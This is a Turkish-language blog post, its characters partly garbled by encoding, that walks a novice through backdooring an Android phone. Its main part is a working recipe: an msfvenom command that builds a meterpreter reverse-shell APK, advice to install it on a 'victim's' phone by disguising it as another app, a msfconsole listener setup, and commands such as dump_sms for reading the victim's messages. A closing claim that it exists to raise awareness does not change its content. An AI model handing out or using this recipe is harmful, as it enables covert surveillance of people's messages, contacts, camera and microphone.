Arka kap� bir sistemin g�venlik mekanizmas�n�n, sistemin verilerine eri�mek i�in alg�lanamayan bir �ekilde atlat�ld��� bir tekniktir.
Arka kap� eri�im y�ntemi bazen program� geli�tiren bir programc� taraf�ndan yaz�l�r. Bazende k�t� niyetli Hackerlar taraf�ndan sistemin herhangi bir g�venlik a���� kullan�larak sisteme yerle�tirilebilir. G�n�m�zde pop�ler olarak bilinen bir ka� farkl� y�ntem olmakla birlikte temel d�zey hacker'lar�n severek kulland��� msfvenom isimli bir ara� mevcut. �zellikle Windows PC ve Android tabanl� i�letim sistemlerinde backdoor uygulamalar� (APK ve EXE) olu�turmaya yar�yor. Olu�turulan bu uygulamalar kullan�c�lar�n cihazlar�na genellikle reklamlarda zorla indirilerek veya farkl� bir uygulamaym�� gibi g�sterilerek kurduruyor. Hi� bir �eyden haberi olmayan cihaz kullan�c�s� t�m mahremini k�t� niyetli ki�ilere haberi olmadan a��yor bunlar;
Telefon veya PC i�in;
-Ortam sesi dinlemek, Kay�t almak
-Anl�k Ekran Foto�raf� �ekebilmek, izlemek
-�ifreler ve sosyal medya hesaplar�
-Kamera izlemek,kay�t alt�na almak
-Taray�c� ge�mi�i
-SMS,WhatsApp mesajlar�
-Sizin ad�n�za sms g�ndermek
-Arama Kay�tlar�
-Medya i�erikleri
�eklinde s�ralanabilir. Neyse ki g�ncel antivir�s yaz�l�mlar� ve g�ncel i�letim sistemleri bunlar�n �stesinden geliyor ve engellemeyi �o�unlukla ba�ar�yor. Ancak yinede dikkatli olmakta fayda var.
Peki normal basit d�zey bir kullan�c� kolayl�kla bir Hacker'a d�n��ebilir mi??
Bu sorunun cevab� EVET, Bu yaz� dizisinde bir android telefonda nas�l BackDoor a�abilece�inizi anlataca��m.
Burada anlat�lan i�lemlerin kullan�lmas� sonucunda do�acak hukuki s�re�ler tamamen i�lemi yapan ki�iye aittir. Bu anlat�m�n nedeni T�rkiye'de Siber fark�ndal�k olu�turmak ve kullan�c�lar�n kendisini korumalar� gerekti�ini ispatlamak i�indir.
�htiya� Listesi
-L�NUX tabanl� bir i�letim sistemi y�kl� PC, Sanal PC kurulumu da yapabilirsiniz. Tavsiyem KAL� L�NUX kurulmas�d�r.
- �nternet Ba�lant�s�
-��renme �ste�i.
1) Kali Linux Cihaz�m�z� a�t�ktan sonra masa�st�nden Terminali �al��t�r�n.
2) msfvenom yaz�n ve enter tu�una bas�n.
3)
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444R > /root/Desktop/android.apk
LHOST yerine kendi yerel ip adresinizi yazacaks�n�z.
��renmek i�in Windows PC'de
windows+R tu�una basarak ipconfig yazabilirsiniz.
�rn: IPv4 Address. . . . . . . . . . . : 192.168.1.105
Yerel A�da �al��aca��m�z i�in port yerine 4444 yazman�z yeterli. Modemde y�nlendirme yapmaya gerek yok.
Bu i�lemden sonra i�erisinde Vir�s bulunan apk dosyam�z� olu�turmu� bulunmaktay�z. olu�turdu�umuz bu dosyay� kurban ki�isinin telefonuna y�klemeniz yeterlidir. 2. ad�mda Olu�turdu�umuz vir�se ba�lanaca��z.
Terminali tekrar a�al�m. S�ras� ile
msfconsole yazal�m
2 3 4 5 6 7 8 9 | msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp PAYLOAD => android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.189.105 LHOST => 192.168.189.105 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit |
Art�k Dinleme i�lemine ge�tik.
ekrana help yazarak yapabileceklerimizi g�rebiliriz. Bunlar;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 | meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module irb Drop into irb scripting mode load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel Stdapi: File system Commands ============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory checksum Retrieve the checksum of a file cp Copy source to destination dir List files (alias for ls) download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory mv Move source to destination pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory Stdapi: Networking Commands =========================== Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table Stdapi: System Commands ======================= Command Description ------- ----------- execute Execute a command getuid Get the user that the server is running as localtime Displays the target system's local date and time pgrep Filter processes by name ps List running processes shell Drop into a system command shell sysinfo Gets information about the remote system, such as OS Stdapi: User interface Commands =============================== Command Description ------- ----------- screenshot Grab a screenshot of the interactive desktop Stdapi: Webcam Commands ======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam Android Commands ================ Command Description ------- ----------- activity_start Start an Android activity from a Uri string check_root Check if device is rooted dump_calllog Get call log dump_contacts Get contacts list dump_sms Get sms messages geolocate Get current lat-long using geolocation hide_app_icon Hide the app icon from the launcher interval_collect Manage interval collection capabilities send_sms Sends SMS from target session set_audio_mode Set Ringer Mode sqlite_query Query a SQLite database from storage wakelock Enable/Disable Wakelock wlan_geolocate Get current lat-long using WLAN information |
�rnek olarak Kurban�m�z�n SMSlerini okumak i�in ekrana yazmam�z gereken kod:
dump_sms
Ve t�m sms gelen kutusunu kopyalam�� oluyoruz.
Siber alanda kendinizi koruman�z dile�i ile..
0 yorum:
Yorum Gönder
YORUMA CEVAP VEREMEYEBİLİRİZ HIZLI CEVAP ALMAK İÇİN
imei repair GRUBUMUZA KATILABİLİRSİNİZ.
https://www.facebook.com/groups/2564106410501110/